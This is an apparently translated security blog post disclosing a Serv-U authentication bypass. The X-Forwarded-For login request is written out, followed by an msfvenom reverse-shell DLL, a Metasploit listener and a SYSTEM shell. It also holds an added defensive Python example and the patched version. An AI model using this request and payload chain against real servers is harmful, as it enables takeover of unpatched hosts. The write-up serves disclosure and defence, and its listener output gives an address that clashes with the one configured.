Serious FTP vulnerability disclosed, affecting more than 15,000 servers
Author: admin | Date: 2017-4-22 16:16:51 | Category: Hacking techniques
This article describes a newly disclosed vulnerability in Serv-U, the file sharing program from SolarWinds. The vulnerability lets an attacker obtain Serv-U administrative privileges and then execute code under the SYSTEM user account.
A Serv-U trial version was installed on a Windows 7 virtual machine for testing.
Serv-U was installed with default settings; exploiting the vulnerability requires no configuration changes at all.
To identify the vulnerability, Burp Suite's Spider feature was used, which found the /?Command=Login page. Fuzzing with the Burp Suite scanner showed that modifying the X-Forwarded-For HTTP header produced different responses. Testing established that when a login request is submitted (without any POST parameters) with the X-Forwarded-For header set to 127.0.0.1, the Serv-U application returns a valid session cookie for the local administrator account.
POST /?Command=Login HTTP/1.1
Host: 127.0.0.1:43958
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Forwarded-For: 127.0.0.1

HTTP/1.0 200 OK
Server: Serv-U/15.1.4.6
Date: Mon, 30 Jan 2017 16:47:40 GMT
Accept-Encoding: deflate
Connection: close
X-Frame-Options: sameorigin
X-Same-Domain: 1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache,no-store,max-age=0,must-revalidate
Expires: -1
Set-Cookie: Session=_78933e21bd7d9f5a64fe82a8029cce5c6a7cda5f1fbf886d74afcb5b36eabf0fe29351b5fa8a8f66b6884d4dc3cb47748f5c30dd378a14690754581406246bf8; path=/; httponly;
Set-Cookie: CsrfToken=D9F1F03FE9F7E8E7D0BE2DEF2ECAED7C; path=/; httponly;
Set-Cookie: SULang=en
Content-Length: 66844

...TRUNCATED...
Submitting this request from Firefox returns an error message.
However, the local administrator session cookie returned by the application is valid.
GET / HTTP/1.1
Host: 127.0.0.1:43958
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: SULang=en%2CUS; killmenothing; Session=_78933e21bd7d9f5a64fe82a8029cce5c6a7cda5f1fbf886d74afcb5b36eabf0fe29351b5fa8a8f66b6884d4dc3cb47748f5c30dd378a14690754581406246bf8; CsrfToken=D9F1F03FE9F7E8E7D0BE2DEF2ECAED7C
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.0 200 OK
Server: Serv-U/15.1.4.6
Date: Mon, 30 Jan 2017 16:48:52 GMT
Accept-Encoding: deflate
Connection: close
X-Frame-Options: sameorigin
X-Same-Domain: 1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache,no-store,max-age=0,must-revalidate
Expires: -1
Set-Cookie: Session=_78933e21bd7d9f5a64fe82a8029cce5c6a7cda5f1fbf886d74afcb5b36eabf0fe29351b5fa8a8f66b6884d4dc3cb47748f5c30dd378a14690754581406246bf8; path=/; httponly;
Set-Cookie: CsrfToken=D9F1F03FE9F7E8E7D0BE2DEF2ECAED7C; path=/; httponly;
Set-Cookie: SULang=en,US
Content-Length: 66844

...TRUNCATED...
sLoggedInUser="(Local Admin)";sLoggedInUserAlt="Local Admin";
...TRUNCATED...
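The root cause is a privilege check that derives the client address from a header the client controls. The following is an added illustration, not Serv-U's code: it models that weak decision next to a hardened one that only honours X-Forwarded-For from an assumed, explicitly listed reverse proxy, and adds the log-side signal a defender would alert on.

```python
import ipaddress
from typing import Mapping

# Added illustration, not Serv-U's code: models the trust decision behind the
# flaw described above, where the address used for the "local administrator"
# check can be chosen by the client through the X-Forwarded-For header.

# Assumed deployment: only these reverse proxies may legitimately set X-Forwarded-For.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def client_ip_vulnerable(peer_ip: str, headers: Mapping[str, str]):
    """Weak: honours X-Forwarded-For from any peer, so a remote caller can
    claim to be 127.0.0.1 and pass a loopback-based privilege check."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return ipaddress.ip_address(xff.split(",")[0].strip())
    return ipaddress.ip_address(peer_ip)


def client_ip_hardened(peer_ip: str, headers: Mapping[str, str]):
    """Only believe X-Forwarded-For when the TCP peer is a known proxy, and then
    use the right-most hop (the one that proxy appended) rather than the
    client-supplied left-most value. Malformed values fall back to the peer."""
    peer = ipaddress.ip_address(peer_ip)
    xff = headers.get("X-Forwarded-For")
    if not xff or peer not in TRUSTED_PROXIES:
        return peer
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    try:
        return ipaddress.ip_address(hops[-1])
    except (ValueError, IndexError):
        return peer


def is_local_admin_login(peer_ip, headers, resolve=client_ip_hardened) -> bool:
    """The privilege decision: a local-admin session only for loopback clients."""
    return resolve(peer_ip, headers).is_loopback


def spoofed_xff_suspected(peer_ip: str, headers: Mapping[str, str]) -> bool:
    """Detection signal for access logs or a WAF rule: a peer that is not a
    trusted proxy sending an X-Forwarded-For claiming a loopback/private address."""
    peer = ipaddress.ip_address(peer_ip)
    xff = headers.get("X-Forwarded-For", "")
    if peer in TRUSTED_PROXIES or not xff:
        return False
    try:
        claimed = ipaddress.ip_address(xff.split(",")[0].strip())
    except ValueError:
        return True  # garbage in a header only proxies should set
    return claimed.is_loopback or claimed.is_private
```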
With administrative rights over the Serv-U application, the attacker can now upload and execute an arbitrary DLL.
Next, a DLL was created that spawns a reverse PowerShell shell to 192.168.1.101:8443, to verify whether it would be blocked by the target's antivirus software.
root@6c656f:~# msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.1.101 LPORT=8443 -f dll > MFC100PWN.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1810 bytes
Final size of dll file: 5120 bytes
root@6c656f:~# file MFC100PWN.dll
MFC100PWN.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
A listener was configured to catch the reverse shell on 192.168.1.101:8443.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/powershell_reverse_tcp
PAYLOAD => windows/x64/powershell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.101
LHOST => 144.217.164.221
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse SSL handler on 192.168.1.101:8443
[*] Starting the payload handler...
msf exploit(handler) >
The malicious DLL was uploaded to "C:\Program Files\RhinoSoft\Serv-U" through the Serv-U Web Client.
The uploaded DLL was then executed.
The DLL runs and the attacker receives a SYSTEM shell.
msf exploit(handler) > [*] Powershell session session 1 opened (192.168.1.101:8443 -> xxx.xxx.xxx.xxx:52069) at 2017-01-30 12:07:05 -0500
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
Windows PowerShell running as user xxxx-xx-xxxx$ on xxxx-xx-xxxx
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Program Files\RhinoSoft\Serv-U>whoami
nt authority\system
As of 30 January 2017, Shodan returned more than 15,000 publicly reachable servers running this application.
Fix: update to Serv-U FTP / MFT Server version 15.1.5.
For more information, see: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-008/?fid=9155
*This article was translated by BUGBANK.cn (漏洞银行).